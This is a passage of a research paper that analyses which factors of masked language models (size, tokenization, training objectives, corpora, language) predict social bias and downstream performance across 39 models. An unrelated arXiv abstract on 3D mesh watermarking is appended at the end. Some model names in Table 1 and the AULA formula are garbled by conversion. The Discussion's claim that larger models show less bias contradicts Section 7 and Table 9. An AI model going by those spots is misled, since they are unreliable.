al. (2019); Liang et al. (2023). However, MLMs trained on massive amounts of textual training data have also been found to encode concerning levels of social biases such as gender and racial biases Kaneko and Bollegala (2019); May et al. (2019); Dev et al. (2020); Silva et al. (2021); Kaneko et al. (2022). In spite of the overall success of MLMs across NLP tasks, such biases within MLMs raise ethical considerations and underscore the need for debiasing methods to ensure fair and unbiased MLMs. On the other hand, MLMs are trained by considering and optimising various underlying factors that contribute to their performance on downstream tasks. These factors include but are not limited to parameter size, tokenization methods, training objectives and training corpora. The performance of MLMs is affected by the interplay of such factors. Nevertheless, it remains unclear as to how these factors influence social biases in MLMs and their downstream task performance. Evaluating the impact of these factors is challenging due to three main reasons: (a) The factors that we consider within a model are not independent, rather, they exhibit complicated interdependence and affect the performance of models simultaneously. (b) MLMs are diverse with different architectures, configurations and parameters. The diversity across models requires the need for generalisation and abstraction when considering the values of factors. (c) Many recent works proposed debiasing methods to mitigate social biases in MLMs Webster et al. (2020); Lauscher et al. (2021); Schick et al. (2021); Guo et al. (2022). However, most debiasing methods tend to worsen the performance of MLMs in downstream tasks Meade et al. (2022). Therefore, it is crucial to consider the trade-off between social bias and downstream task performance when comparing MLMs. To address the non-independent issue of factors, we propose a method using Gradient Boosting Freund and Schapire (1997) to consider dependencies among factors. Moreover, we use the coefficient of determination (\(R^{2}\); Nagelkerke et al. (1991)) as a measure to analyse the importance of factors. Regarding the diversity of MLMs, we converge a broad set of MLMs across multiple languages and 4 domains, resulting in 39 MLMs for evaluation in total. Moreover, we incorporate TweetEval and GLUE to evaluate the downstream task performance of MLMs, meanwhile, evaluating their social biases intrinsically using All Unmasked Likelihood with Attention weights (AULA; Kaneko and Bollegala (2022)) on two benchmarks StereoSet (SS; Nadeem et al. (2021)) and crowdsourced stereotype pairs benchmark (CP; Nangia et al. (2020)). Note that we are not proposing novel bias evaluation measures in this paper. Instead, we use existing metrics such as AULA to evaluate social biases. Our experimental results indicate that model size, training objectives and tokenization are the three most important categories of factors that affect the social bias and downstream task performance of MLMs. Interestingly, we observe that models using Byte-Pair Encoding (BPE; Sennrich et al., 2016) include lower level of social biases, while achieving the best downstream performance compared to models using other tokenization methods. Overall, multilingual models tend to have less biases than their monolingual counterparts. ## 2 Related Work As MLMs have been successfully applied to diverse NLP tasks, it is important to study the factors that determine their social biases. Rogers et al. (2020) reviewed the current state of knowledge regarding how BERT works, what kind of information it learns and how it is encoded, typically alterations to its training objectives and architecture, the overparameterization issue and approaches to compression. Xia et al. (2020) studied contextualised encoders in various aspects and discussed the trade-off between task performance and the potential harms contained in the pretraining data. Later, Perez-Mayos et al. (2021) investigated the effect of pretraining data size on the syntactic capabilities of RoBERTa and they showed that models pretrained with more data tend to encode better syntactic information and provide more syntactic generalisation across different syntactic structures. However, these studies focus on MLMs in downstream tasks, while none consider the social biases in MLMs. On the other hand, models trained for different downstream tasks have been found to exhibit social biases. Kiritchenko and Mohammad (2018) evaluated gender and racial biases across 219 automatic sentiment analysis systems and discovered statistically significant biases occurring in several systems. Diaz et al. (2018) studied age-related biases in sentiment classification and discovered that significant age bias is encoded in the output of many sentiment analysis systems as well as word embeddings. Zhao et al. (2020) focused on gender bias in multilingual embeddings and its influence on the process of transfer learning for NLP applications. They showed that the level of bias in multilingual representations varies depending on how the embeddings are aligned to different target spaces, and that the alignment direction can also affect the bias in transfer learning. Choenni et al. (2021) investigated the types of stereotypical information that are captured by pretrained language models and showed the variability of attitudes towards various social groups among models and the rapid changes in emotions and stereotypes that occur during the fine-tuning phase. Existing bias evaluation methods use different strategies such as pseudo likelihood (Kaneko and Bollegala, 2022), cosine similarity (Caliskan et al., 2017; May et al., 2019), inner-product (Ethayarajh et al., 2019), to name a few. Independently of any downstream tasks, intrinsic bias evaluation measures (Nangia et al., 2020; Nadeem et al., 2021; Kaneko and Bollegala, 2022) evaluate social biases in MLMs stand alone. However, given that MLMs are used to represent input texts in a variety of downstream tasks, multiple previous works have proposed that social biases should be evaluated with respect to those tasks (De-Arteaga et al., 2019; Webster et al., 2020). Kaneko and Bollegala (2021) showed that there exists only a weak correlation between intrinsic and extrinsic social bias evaluation measures. In this paper, we use an intrinsic bias evaluation measure, namely AULA, to evaluate social biases in MLMs. AULA has been shown to be the most reliable bias evaluation measure (Kaneko and Bollegala, 2022), hence we use it as our bias evaluation measure. Although we specifically focus on MLMs in this paper, evaluating the performance predictors for Neural Architecture Search (NAS) (White et al., 2021; Elsken et al., 2019) has been conducted for designing high performance neural networks. Generalisability of the identified factors is an important in NAS because the selected neural architecture would be trained on different datasets to obtain different models. Although it would be ideal to perform a controlled training of MLMs where we experimentally fix all other factors except for a single target factor and then analyse the trained MLM, this is an expensive undertaking given the computational cost of training MLMs on large datasets. On the other hand, we consider already pre-trained MLMs that are publicly made available and do not train any MLMs during this work. ## 3 Analysis of Factors In order to study the impact of different factors in MLMs, we consider 30 factors and split them into 5 categories. The details of each individual factor are provided in Appendix C. ### Model Size Models with smaller sizes are generally more lightweight and require less computational resources, making them suitable for deployment on resource-constrained devices or in environments with limited processing power. However, larger models tend to have better performance on downstream tasks but demand more memory, computational power, and longer inference times. On the other hand, the different architectures of models have various numbers of layers as well as training parameters. Recently, MLMs have achieved impressive results on downstream tasks by scaling model size or training with larger datasets (Conneau et al., 2020; Goyal et al., 2021; Liang et al., 2023). To investigate the impact of model size, we consider 3 factors: (1) parameter size, (2) number of layers and (3) vocabulary size. The parameter size is considered as a categorical feature, in which we divide the parameter size of an MLM into 3 categories according to pre-defined ranges. Specifically, we assign S if the parameter size of an MLM is less than 100M, M if the size is within 100M-300M, and L if the size is greater than 300M. Similarly, we convert the vocabulary size into the same three categories for the models with vocabulary sizes less than 50K, within 50K-100K and greater than 100K, respectively. For the number of layers, we use the number as a feature: 6, 12 and 24 layers. ### Training Methods and Objectives In this category, we consider the methods used during model pretraining as well as the training objectives of MLMs. First, we take into account different masking techniques, starting with the masking technique initially proposed for training BERT (Devlin et al., 2019). Masked language modelling is an objective used during pretraining to improve the model's understanding, in which a certain percentage of words in the input text are randomly selected and replaced with a special [MASK] token, then the model is trained to predict the original word based on its context. Later, they further proposed whole word masking, which aims to improve the handling of individual words with a context. Rather than randomly selecting WordPiece (Wu et al., 2016) produced subtokens to mask, whole word masking always masks the entire words at once, which has been shown to reduce ambiguity and enable better word-level comprehension and contextual understanding for MLMs (Cui et al., 2021). Apart from these two masking techniques, we consider three other training objectives: (a) next sentence prediction, (b) sentence ordering prediction, and (c) mention reference prediction. We consider the training objectives to be binary and assign 1 if each of them is used and 0 otherwise. Model distillation is a training technique aiming to train a small student model to transfer the knowledge and capabilities from a larger teacher model (Hinton et al., 2015). This technique has been shown to effectively compact a large language model, while retaining comparable performance compared to the original model (Sanh et al., 2019; Wu et al., 2022). Model distillation is regarded as a binary factor, which is assigned 1 if an MLM uses model distillation, otherwise, it returns 0. ### Training Corpora Training corpora are the collections of texts or data used to train MLMs. According to Kalyan et al. (2021), training corpora can be classified into four types: (1) general, (2) social media, (3) language-specific and (4) domain-specific. In order to conduct a comprehensive study of MLMs trained using different types of training corpora, we cover all four types of training corpora, resulting in four different domains (including general domain): (1) General Domain: BookCorpus (Books), Wikipedia (Wiki), Common Crawl-News (CCNews), OpenWebText (OWT), and Stories; (2) Social Media: Tweets and the Reddit Abusive Language English dataset (RALE); (3) Legal Domain: Patent Litigations, Caselaw Access Project (Caselaw) and Google Patents Public Data (GooglePatents); (4) Biomedical Domain: Full-text biomedical papers from the Semantic Scholar Open Research Corpus (S2ORC), PubMed Abstracts (PMed), PMC Full-text articles and the Medical Information Mart for Intensive Care III (MIMIC3); Finally, we also consider a multilingual corpus: CommonCrawl Corpus in 100 languages (CC100). Each of the training corpora is considered as an individual binary factor. Owing to the domain of an MLM being associated with the training corpora sampled in that certain domain, we additionally consider domain as a separate factor. This domain factor is included as a categorical factor, with 4 different domains as categories: general domain, social media, legal domain and biomedical domain. Finally, we take into account continuous training as a binary factor which takes 1 if an MLM is continuously trained on training corpora from different domains and 0 if the model is trained from scratch. ### Tokenization Tokenization is an essential process of breaking down a sequence of text into smaller units, which is able to convert unstructured text data into a format that can be processed by MLMs. Prior works study different tokenization methods on MLMs in different languages Park et al. (2020); Rust et al. (2021); Toraman et al. (2023), however, the impact of tokenization methods on social bias in MLMs and different downstream tasks remains unrevealed. Therefore, we consider the three most commonly used tokenization methods as categorical factors: BPE, WordPiece and SentencePiece. ### Language In this category, we consider both monolingual and multilingual MLMs. Specifically, we regard language as a categorical factor and use _English_ and _Multilingual_ to represent if an MLM is monolingual or multilingual, respectively. In addition, the number of languages is also considered as a separate factor, which is categorical and takes the actual number of languages an MLM trained on. ## 4 Masked Language Models To conduct a comprehensive study of different factors of MLMs affecting social bias and task performance, we evaluate 39 pretrained MLMs,1 which we divide into four categories as follows. Table 1 summarizes all models. Footnote 1: In our initial selection of models, albert-xlarge-v2, nirels/coref-roberta-large, vinai/bertweet-large, xlm-roberta-base and facebook/xlm-v-base attained an unusual poor performance on the Corpus of Linguistic Acceptability (CoLA) (i.e., a subtask of GLUE) and TweetEval. This is likely caused by an implementation issue that would need some modification. Therefore, to avoid potentially false outliers, we omitted these five models when evaluating TweetEval and GLUE. Monolingual and domain-specific modelsWe consider the MLMs either directly or continuously trained in domain-specific English corpora with different settings, consisting of RoBERTa in social media domain Barbieri et al. (2020), BERT in social media domain Nguyen et al. (2020); Caselli et al. (2021), RoBERTa in legal domain Geng et al. (2021), RoBERTa in biomedical domain Gururangan et al. (2020), and BERT in biomedical domain Alsentzer et al. (2019); Lee et al. (2020); Peng et al. (2019). Multilingual and general domain modelsWe take into account the multilingual MLMs with different settings pretrained in the general domain, containing different settings of multilingual BERT Devlin et al. (2019), DistillBERT Sanh et al. (2019) and XLM-R Conneau et al. (2020). Multilingual and domain-specific modelsWe select the multilingual MLMs pretrained in domain-specific corpora, containing XLM-T Barbieri et al. (2022). ## 5 MLM Evaluation Metrics and Tasks Our goal in this paper is to study the relationship between model factors and social bias as well as downstream task performance in pretrained MLMs. For this purpose, we conduct our evaluations using three different types of tasks. \begin{table} \begin{tabular}{l l} \hline \hline Model Type & Models \\ \hline General Domain & roberta-base, roberta-large, bert-base-cased, bert-large-cased, bert-large-uncased, bert-large-uncased, bert-large-uncased, bert-large-uncased-whole-word-masing, albert-base-v2, albert-large-v2, albert-large-v2, albert-large-v2, albert-large-v2, albert-large-v2, \\ (Monolingual) & albert-xlarge-v2, albert-base-cased, distilbert-base-uncased, distilbert-base-uncased, distilbert-base-uncased, distilbert-base, bert-large-uncased, whole-word-masing, nirels/coref-roberta-large, nirels/coref-roberta-base, nirels/coref-bert-large \\ \hline Domain-specific & cardiffin/br/witter-roberta-base, cardiffin/brwitter-roberta-base, scratch-roberta-base, vinai/bertweet-large, GroNLP,@rateBERT, al-lai/biomed_roberta_base, saiho/legal-roberta-base, ensily/olement/Bio_ClinicalBERT, \\ (Monolingual) & emily/aetter/Bio_ClinicalBERT, \\ & dmis-lab/biobject-base-cased-v1,2 \\ & bionlp/bluebert_pubmed_mimic_uncased_L-12_H- \\ & 768.A-12, bionlp/bluebert_pubmed_mimic_uncased_L- \\ & 24.H-102.A-16, cardiffin/brwitter-roberta-large- \\ & 2022-154m, cardiffin/brwitter-roberta-base-2022- \\ & 154m \\ \hline General Domain & bert-base-multilingual-cased, bert-base-multilingual-uncased, distilbert-base-multilingual-cased, \\ (Multilingual) & xlm-roberta-base, xlm-roberta-large, xlm-v-base \\ \hline Domain-specific & cardiffin/brwitter-xlm-roberta-base \\ (Multilingual) & cardiffin/brwitter-xlm-roberta-base \\ \hline \hline \end{tabular} \end{table} Table 1: Summary of the MLMs in the analysis. ### Social Bias For an MLM under evaluation, we compare the pseudo-likelihood scores returned by the model for stereotypical and anti-stereotypical sentences using AULA (Kaneko and Bollegala, 2022). AULA evaluates social biases by taking into account the MLM attention weights as the importance of tokens. This approach is shown to be robust against frequency biases in words and offers more reliable estimates compared to alternative metrics used to evaluate social biases in MLMs. Following the standard evaluation protocol, we provide AULA the complete sentence \(S=t_{1},\dots,t_{|S|}\), which contains a length \(|S|\) sequence of tokens \(t_{i}\), to an MLM with pretrained parameters \(\theta\). We compute the Pseudo Log-Likelihood, denoted by \(\mathrm{PLL}(S)\), to predict all tokens in \(S\) excluding begin and end of sentence tokens. The PLL(S) score of sentence \(S\) given by (1) can be used to evaluate the preference expressed by an MLM for \(S\): \[\mathrm{PLL}(S)\coloneqq\frac{1}{|S|}\sum_{i=1}^{|S|}\alpha_{i}\log P(t_{i}|S ;\theta) \tag{1}\] Here \(\alpha_{i}\) is the average of all multi-head attention weights associated with \(t_{i}\), while \(P(t_{i}|S;\theta)\) is the probability assigned by the MLM to token \(t_{i}\) conditioned on \(S\). Given a sentence pair, the percentage of stereotypical (\(S^{st}\)) sentence preferred by the MLM over anti-stereotypical (\(S^{at}\)) one is considered as the AULA _bias score_ of the MLM and is given by (2): \[\mathrm{AULA}=\left(\frac{100}{N}\sum_{(S^{\mathrm{st}},S^{\mathrm{st}})} \mathbb{I}(\mathrm{PLL}(S^{\mathrm{st}})>\mathrm{PLL}(S^{\mathrm{st}}))\right) \tag{2}\] Here, \(N\) is the total number of text instances and \(\mathbb{I}\) is the indicator function, which returns \(1\) if its argument is True and \(0\) otherwise. AULA score given by (2) falls within the range \([0,100]\) and an unbiased model would return bias scores close to 50, whereas bias scores less or greater than 50 indicate bias directions towards the anti-stereotypical or stereotypical group, respectively. Social Bias BenchmarksWe conduct experiments on the two most commonly used social bias evaluation datasets for MLMs: StereoSet (SS) and Crowdsourced Stereotype Pairs benchmark (CP). SS contains associative contexts, which cover four types of social biases: race, gender, religion, and profession, while CP is crowdsourced and annotated by workers in the United States, consisting of nine types of social biases: race, gender, sexual orientation, religion, age, nationality, disability, physical appearance, and socioeconomic status/occupation. We follow the work from Kaneko and Bollegala (2022)2 and use the default setting for evaluation. We denote the AULA computed on the CP and SS datasets by A-CP and A-SS, respectively, in the rest of the paper. Footnote 2: [https://github.com/kanekomashiro/evaluate_bias_in_mlm](https://github.com/kanekomashiro/evaluate_bias_in_mlm) ### Downstream Performance To further investigate the impact of factors of an MLM in terms of its downstream tasks performance, we evaluate MLMs on two additional benchmark datasets: The General Language Understanding Evaluation (GLUE) benchmark (Wang et al., 2018)3 and social media TweetEval benchmark (Barbieri et al., 2020).4 Footnote 3: [https://gluebenchmark.com/](https://gluebenchmark.com/) Footnote 4: [https://github.com/cardifrnlp/tweeteval](https://github.com/cardifrnlp/tweeteval) GlueGLUE is comprised of 9 tasks for evaluating natural language understanding systems. The tasks in GLUE are Corpus of Linguistic Acceptability (CoLA; Warstadt et al., 2019), Stanford Sentiment Treebank (SST-2; Socher et al., 2013), Microsoft Research Paraphrase Corpus (MRPC; Dolan and Brockett, 2005), Semantic Textual Similarity Benchmark (STS-B; Cer et al., 2017), Quora Question Pairs (QQP; Iyer et al., 2017), Multi-Genre NLI (MNLI; Williams et al., 2018), Question NLI (QNLI; Rajpurkar et al., 2016), Recognizing Textual Entailment (RTE; Dagan et al., 2005; Haim et al., 2006; Giampiccolo et al., 2007; Bentivogli et al., 2009) and Winograd NLI (WNLI; Levesque et al., 2012). These tasks are framed as classification tasks for either single sentences or pairs of sentences. We follow the finetuning procedures from prior work (Devlin et al., 2019; Liu et al., 2019) and report results on the development sets. TweetEvalTweetEval is a unified Twitter benchmark composed of seven heterogeneous tweet classification tasks. The tasks in TweetEval are emoji prediction (Barbieri et al., 2018), emotion recognition (Mohammad et al., 2018), hate speech detection (Basile et al., 2019), irony detection (Van Hee et al., 2018), offensive language identification (Zampieri et al., 2019), sentiment analysis Rosenthal et al. (2017) and stance detection Mohammad et al. (2016). We use the default setting as the TweetEval original baselines to fine-tune pretrained MLMs on the corresponding training set and report average results on the test set after 3 runs. ### Correlation between tasks Table 2 shows the Pearson and Spearman's correlation coefficients between each pair of task performances over the 39 MLMs. We observe a moderate correlation between A-SS and GLUE, which indicates that better performance in GLUE entails a higher stereotypical bias in SS (this is also true for CP but to a much lesser extent). In contrast, there is no significant correlation observed between the models' performance on downstream tasks, i.e., TweetEval vs. GLUE. ## 6 Regression Analysis To investigate the importance of the different factors on social bias and the task performance of MLMs, we train a regression model. ### Experimental setting We generate the features for each MLM according to its factors as described in SS3. An example of the features of an individual model is given in Table 3. These features are fed into a regression model as input for training, using both social bias and task performance as output. In order to select the best regression model for this purpose, we compare the performance of 6 different regression models on each prediction task, namely gradient boosting, support vector machine, gaussian process regression, decision tree, random forest and linear regression. We compute the performance of the regression models by means of their coefficient of determination (\(R^{2}\)) and root mean squared error (RMSE) for each prediction task. We use the regression models implemented in sklearn with the default parameters and take the averages over three independent runs. Regression model comparisonThe comparison of different regression models trained using the features from the monolingual MLMs in the general domain is shown in Table 4, while the performance of regression models trained using the features from all of the MLMs is shown in SS A.1. From Table 4, we observe that gradient boosting obtains the best performance in terms of both \(R^{2}\) and RMSE on both A-CP and TweetEval, while the decision tree obtains the best performance on A-SS. Almost all of the regression models return negative \(R^{2}\) scores for GLUE, which proves hard to predict from the analysed factors. An error analysis of each GLUE subtask on gradient boosting in terms of \(R^{2}\) scores is shown in Appendix B. In contrast, the three remaining social-related evaluations, including TweetEval, can be predicted to a reasonable extent. The linear regression model obtains the lowest \(R^{2}\) scores for both A-CP and GLUE, which indicates that a linear model may not be suitable for predicting the performance of MLMs. Given the results, we decided to use gradient boosting for the rest of the experiments in this paper. Feature importanceIn addition, to investigate the influence of the factors on the performance of MLMs using \(R^{2}\) and RMSE, we compute the importance score of each factor after training the regression model using the Gini importance implemented in sklearn. The Gini importance is computed as the normalized total reduction of the criterion brought by that feature. It calculates the global contribution of each feature by aggregating the losses incurred in each split made by that feature Delgado-Panadero et al. (2022). ### Results Feature importanceTable 5 shows the Gini importance scores of each factor. Due to space constraints in this table, we have omitted the factors that received a score of 0 importance (the full table is shown in SSA.2). The parameter size obtains the largest importance score for A-CP, while it is the second most important factor for TweetEval and GLUE. Tokenization is the most important factor for A-SS and the second most for A-CP. \begin{table} \begin{tabular}{l l l} \hline \hline Task pair & Pearson & Spearman \\ \hline A-CP vs. A-SS & 0.607\({}^{\dagger}\) & 0.623\({}^{\dagger}\) \\ A-CP Vs. TweetEval & 0.193 & 0.214 \\ A-CP vs. GLUE & 0.244 & 0.286 \\ A-SS vs. TweetEval & 0.338 & 0.304 \\ A-SS vs. GLUE & 0.382\({}^{\dagger}\) & 0.487\({}^{\dagger}\) \\ TweetEval vs. GLUE & 0.229 & 0.309 \\ \hline \hline \end{tabular} \end{table} Table 2: Pearson and Spearman correlations between the models’ performance on pairs of tasks, where \(\dagger\) denotes statistically significant (\(p\)<\(0.05\)) correlations. Factor analysisTo further study the effects of factors on MLMs, we eliminate each of the important factors (i.e., the ones that obtain non-zero importance scores) at a time and track the \(R^{2}\) score returned by the gradient boosting models trained on different tasks. Table 6 shows the result. In this table, the lower \(R^{2}\) score indicates the more important the factor is. Consistent with the result shown in Table 5, sentence order prediction and parameter size are the most and second most important factors for TweetEval, respectively, and parameter size is the most important factor for A-CP. For A-SS, uncased and tokenization are the most and second most important factors, respectively. In addition, we show the corresponding important scores for each factor for training decision tree models in SSA.3 and observe largely similar conclusions to the result presented in Table 5. in SS3. To investigate the effect of a certain group, we conduct ablations by removing a group of factors as well as retaining only one group at a time. Tables 7 and 8 show the corresponding results. The training objectives group of factors is regarded as paramount for social bias evaluation (i.e., A-CP and A-SS) in Table 7, and their removal leads to a substantial decrease in the \(R^{2}\) scores. Meanwhile, Table 8 shows much lower \(R^{2}\) scores across all the cases. This is because of the discrepancy between removing a group of factors and retaining only one category, as the latter entails a reduced utilization of features during the training process. Despite this limitation, we observe that by keeping tokenization only, the regression model can still make relatively accurate predictions for social bias evaluation, indicating that tokenization is important for social bias evaluation. In contrast, training corpora and training objectives are the most important ones on the downstream tasks. ## 7 Qualitative Analysis With the knowledge that model size, tokenization, and training objectives are the three primary categories of factors influencing social bias and task performance in MLMs from SS6.2, we further investigate the factors within each category to discern their individual contributions in MLMs. For this purpose, we calculate the average performance of MLMs when considering a specific feature associated with a factor for each task. To capture the overall trend, we extend our analysis to include not only monolingual MLMs in the general domain but also domain-specific and multilingual MLMs. Table 9 shows the average scores for the top-5 performing MLMs for each category of the important factors. Note that the number of models associated with each category within a specific factor is different. For example, there are 21 MLMs in the _medium_ and 12 in the _large_ categories, whereas there are only 6 in the _small_ category for the parameter size factor. Because some outlier cases are affecting the overall averages, in Table 9 we compute the top-5 performing models in each category, whereas the averages over all models are shown in SSA.4. For the model size, we observe that the MLMs trained with a parameter size greater than 100M tend to have better downstream task performance, while reporting higher levels of social biases compared to the ones with a smaller parameter size. The models trained with 6 layers demonstrate the least amount of social biases (i.e., A-CP and A-SS close to 50), however, the ones trained with 24 lay \begin{table} \begin{tabular}{l c c c c} \hline \hline Categories & A-CP & A-SS & TweetEval & GLUE \\ \hline _Without Removing_ & 0.594 & 0.652 & 0.481 & -0.201 \\ Model Size & 0.587 & 0.670 & **0.304** & -0.290 \\ Training Corpora & 0.631 & 0.607 & 0.322 & -0.217 \\ Training Objectives & **-1.010** & **-1.300** & 0.415 & -0.222 \\ Tokenization & 0.563 & 0.100 & 0.428 & **-1.210** \\ Language & 0.589 & 0.646 & 0.450 & -0.173 \\ \hline \hline \end{tabular} \end{table} Table 7: \(R^{2}\) scores removing features from a single category. The most important categories on each task (i.e., those causing a larger \(R^{2}\) drop) are shown in bold. \begin{table} \begin{tabular}{l c c c c} \hline \hline Categories & A-CP & A-SS & TweetEval & GLUE \\ \hline _ALL_ & 0.594 & 0.652 & 0.481 & -0.201 \\ Model Size & 0.096 & -0.420 & 0.191 & -0.780 \\ Training Corpora & -0.044 & 0.028 & **0.340** & -0.225 \\ Training Objectives & -0.180 & 0.319 & -0.944 & **0.008** \\ Tokenization & **0.240** & **0.358** & 0.251 & -0.024 \\ Language & 0.000 & -0.004 & -0.488 & -0.005 \\ \hline \hline \end{tabular} \end{table} Table 8: \(R^{2}\) scores keeping features from one category only. The most important factors on each predicted task are shown in bold. \begin{table} \begin{tabular}{l c c c c} \hline \hline & A-CP & A-SS & TweetEval & GLUE \\ \hline Parameter Size & & & & \\ S (\(x<100M\)) & **54.866** & **57.730** & 59.903 & 78.827 \\ M (\(100M\leqslant x\leqslant 300M\)) & 57.388 & 60.246 & **64.472** & 80.137 \\ L (\(x>300M\)) & 59.072 & 59.838 & 64.040 & **81.449** \\ \hline Number of Layers & & & & \\ 6 layers & **53.383** & **55.097** & 60.116 & 76.288 \\ 12 layers & 57.546 & 60.398 & 64.472 & 81.225 \\ 24 layers & 59.336 & 60.104 & **64.714** & **82.163** \\ \hline Vocabulary Size & & & & \\ S (\(x<50K\)) & 58.196 & 60.674 & 62.101 & **82.413** \\ M (\(50K\leqslant x\leqslant 100K\)) & 58.422 & 60.322 & **65.676** & 81.472 \\ L (\(x>100K\)) & **52.386** & **53.602** & 59.714 & 74.832 \\ \hline Tokenization & & & & \\ BPE & & & & \\ WordPiece & 57.838 & 60.086 & 62.101 & 81.287 \\ SentencePiece & **54.800** & **56.382** & 60.470 & 77.210 \\ \hline Training Objectives & & & & \\ MLM & & & & \\ MLM + NSP & 57.904 & 60.294 & **65.676** & 81.028 \\ MLM + NSP & 56.142 & 58.034 & 61.593 & 80.197 \\ MLM + SOP & 56.995 & 59.185 & 57.314 & **84.926** \\ MLM + MRP & **52.140** & **56.230** & 60.012 & 79.872 \\ WWM + NSP & 59.715 & 60.805 & 62.225 & 80.420 \\ \hline \hline \end{tabular} \end{table} Table 9: Comparison of social bias and task performance of the top 5 performing MLMs on different tasks, according to different features associated with the important factors. MLM, NSP, WWM, SOP and MRP represent masked language modeling, next sentence prediction, whole word masking, sentence ordering prediction and mention reference prediction, respectively. ers obtain better downstream task performance. As for the vocabulary size, the models trained with small- and medium-sized vocabulary obtain the best performance on GLUE and TweetEval, respectively, whereas the ones with a large vocabulary size contain less degree of social biases. Regarding the tokenization methods, we see that the models using SentencePiece contain the lowest level of social biases, while the models using BPE obtain better downstream task performance. With respect to training objectives, the models trained with both masked language modelling and mention reference prediction contain the fewest degrees of social biases. On the other hand, models trained with masked language modelling only and models with both masked language modelling and sentence ordering prediction return the best downstream task performance on TweetEval and GLUE, respectively. ## 8 Discussion Model size.Larger MLMs have a higher capability to achieve better performance on downstream tasks, while smaller models are computationally efficient and require fewer hardware resources. From Table 9, we see that models with a larger number of parameters and more layers report better performance in GLUE and TweetEval compared to the smaller and shallower models, while at the same time demonstrating lesser social biases in terms of A-CP and A-SS scores. Because the learning capacity of MLMs increases with the number of parameters and the depth (i.e. number of layers), it is not surprising that larger models outperform the smaller ones on downstream tasks. However, it is interesting to observe that social biases do not necessarily increase with this extra capacity of the MLMs. In the case of gender-related biases, Tal et al. (2022) showed that even if the gender bias scores measured on Winogender Rudinger et al. (2018) are smaller for the larger MLMs, they make more stereotypical errors with respect to gender. However, whether this observation generalises to all types of social biases remains an open question. Mono- vs. Multi-lingual.Table 10 top compares the performance of monolingual vs. multilingual MLMs. We see that multilingual models demonstrate lower levels of social biases compared to their monolingual counterparts. This aligns with prior works that conjecture a multilingual language model to benefit from training over a larger number of languages, thus incorporating a greater spectrum of cultural diversity Liang et al. (2020); Ahn and Oh (2021). Consequently, the presence of these divergent viewpoints within the model can potentially mitigate social biases. Conversely, monolingual models obtain better performance on TweetEval and GLUE, which are limited to English. General vs. Domain-specific.Table 10 bottom shows the performance of models from different domains. Recall from SS4 that we include domain-specific models for social media, legal and biomedical domains. As TweetEval is a social media benchmark, we additionally include the performance of models in the social media domain. Models in the social media domain contain the least bias according to A-CP and achieve the best performance on TweetEval. Conversely, the performance of models in the general domain is better than domain-specific ones on GLUE and obtains the lowest bias score for A-SS. This result is not surprising given the focus on improving tasks of the given domain for domain-specific models, rather than to improve in general tasks. ## 9 Conclusion Despite the extensive prior work evaluating social bias in MLMs, the relationship between social biases and the factors associated with MLMs remains unclear. To address this gap, we conducted the first-ever comprehensive study of this type through predictive factor analysis to investigate the impact of different factors on social bias and task performance in pretrained MLMs, considering 39 models with 30 factors. We found that model size, tokenization and training objectives are the three most important factors across tasks. In terms of social biases, domain-specific models do not appear to be more or less biased than general domains, while multilingual models, which are trained on corpora covering different languages and cultures, appear to be less socially biased than the monolingual ones. \begin{table} \begin{tabular}{l c c c c} \hline \hline Models & A-CP & A-SS & TweetEval & GLUE \\ \hline Monolingual & 54.157 & 56.062 & **60.953** & **79.648** \\ Multilingual & **50.342** & **52.092** & 58.187 & 71.723 \\ \hline General Domain & 54.157 & **56.062** & 60.953 & **79.648** \\ Domain-specific & 54.042 & 56.962 & 61.062 & 75.547 \\ Social Media Domain & **53.325** & 57.438 & **64.339** & 75.713 \\ \hline \hline \end{tabular} \end{table} Table 10: The performance of monolingual vs. multilingual models and general domain vs. domain-specific models on social bias and downstream tasks. ### Acknowledgements Jose Camacho-Collados and Yi Zhou are supported by a UKRI future leaders fellowship. Danushka Bollegala holds concurrent appointments as a Professor at University of Liverpool and as an Amazon Scholar. This paper describes work performed at the University of Liverpool and is not associated with Amazon. ### Limitations This paper studies the impact of underlying factors of MLMs on social bias and downstream task performance. In this section, we highlight some of the important limitations of this work. We hope this will be useful when extending our work in the future by addressing these limitations. As described in SS 6, the regression models we take into account in this paper are not able to be properly trained based on the features that we considered. Extending the factors and further exploring the reason for the poor performance of regression models on GLUE is one future direction. We limit our work in this paper to focusing on evaluating intrinsic social bias captured by MLMs. However, there are numerous extrinsic bias evaluation datasets existing such as BiasBios De-Arteaga et al. (2019), STS-bias Webster et al. (2020), NLIbi bias Dev et al. (2020). Extending our work to evaluate the extrinsic biases in MLMs will be a natural line of future work. Furthermore, our analysis focuses on MLMs and not considering generative language models such as GPT-2 Radford et al. (2019), Transformer-XL Dai et al. (2019), XLNet Yang et al. (2019) and GPT-3 Brown et al. (2020). Extending our work to investigate the relationship between models' factors and social bias as well as downstream performance is deferred to future work. Finally, although we tried to collect as many MLMs as possible, the final number may be in some cases insufficient to draw conclusive numerical conclusions in the regression analysis. ### Ethical Considerations In this paper, we aim to investigate which factors affect the social bias captured by MLMs. Although we used existing datasets that are annotated for social biases, we did not annotate nor release new datasets as part of this research. In particular, we did not annotate any datasets by ourselves in this work and used multiple corpora and benchmark datasets that have been collected, annotated and repeatedly used for evaluations in prior works. To the best of our knowledge, no ethical issues have been reported concerning these datasets. The gender biases considered in the bias evaluation datasets in this paper cover only binary gender Dev et al. (2021). However, non-binary genders are severely underrepresented in textual data used to train MLMs. Moreover, non-binary genders are often associated with derogatory adjectives. Evaluating social bias by considering non-binary gender is important. Furthermore, biases are not limited to word representations but also appear in sense representations Zhou et al. (2022). However, our analysis did not include any sense embedding models.
2307.11628
Rethinking Mesh Watermark: Towards Highly Robust and Adaptable Deep 3D Mesh Watermarking
The goal of 3D mesh watermarking is to embed the message in 3D meshes that can withstand various attacks imperceptibly and reconstruct the message accurately from watermarked meshes. The watermarking algorithm is supposed to withstand multiple attacks, and the complexity should not grow significantly with the mesh size. Unfortunately, previous methods are less robust against attacks and lack of adaptability. In this paper, we propose a robust and adaptable deep 3D mesh watermarking Deep3DMark that leverages attention-based convolutions in watermarking tasks to embed binary messages in vertex distributions without texture assistance. Furthermore, our Deep3DMark exploits the property that simplified meshes inherit similar relations from the original ones, where the relation is the offset vector directed from one vertex to its neighbor. By doing so, our method can be trained on simplified meshes but remains effective on large size meshes (size adaptable) and unseen categories of meshes (geometry adaptable). Extensive experiments demonstrate our method remains efficient and effective even if the mesh size is 190x increased. Under mesh attacks, Deep3DMark achieves 10%~50% higher accuracy than traditional methods, and 2x higher SNR and 8% higher accuracy than previous DNN-based methods.
Xingyu Zhu, Guanhui Ye, Xiapu Luo, Xuetao Wei
2023-07-21T14:49:30Z
